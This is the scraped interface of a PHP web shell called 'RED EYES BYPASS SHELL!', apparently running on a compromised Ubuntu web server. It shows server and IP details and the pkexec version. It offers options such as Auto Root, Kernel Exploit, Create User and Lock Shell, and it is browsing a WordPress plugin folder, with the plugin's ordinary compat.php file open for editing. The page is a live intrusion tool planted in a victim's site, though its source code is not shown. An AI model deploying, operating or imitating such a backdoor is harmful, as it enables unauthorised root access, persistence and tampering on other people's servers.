Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
plugins /
wordpress-importer /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
parsers
[ DIR ]
drwxr-xr-x
php-toolkit
[ DIR ]
drwxr-xr-x
class-wp-import.php
56.32
KB
-rwxr-xr-x
compat.php
864
B
-rwxr-xr-x
parsers.php
642
B
-rwxr-xr-x
readme.txt
6.5
KB
-rwxr-xr-x
wordpress-importer.php
2.62
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : compat.php
<?php /** * Implementation for WordPress functions missing in older WordPress versions. * * @package WordPress * @subpackage Importer */ if ( ! function_exists( 'wp_slash_strings_only' ) ) { /** * Adds slashes to only string values in an array of values. * * Compat for WordPress < 5.3.0. * * @since 0.7.0 * * @param mixed $value Scalar or array of scalars. * @return mixed Slashes $value */ function wp_slash_strings_only( $value ) { return map_deep( $value, 'addslashes_strings_only' ); } } if ( ! function_exists( 'addslashes_strings_only' ) ) { /** * Adds slashes only if the provided value is a string. * * Compat for WordPress < 5.3.0. * * @since 0.7.0 * * @param mixed $value * @return mixed */ function addslashes_strings_only( $value ) { return is_string( $value ) ? addslashes( $value ) : $value; } }
Close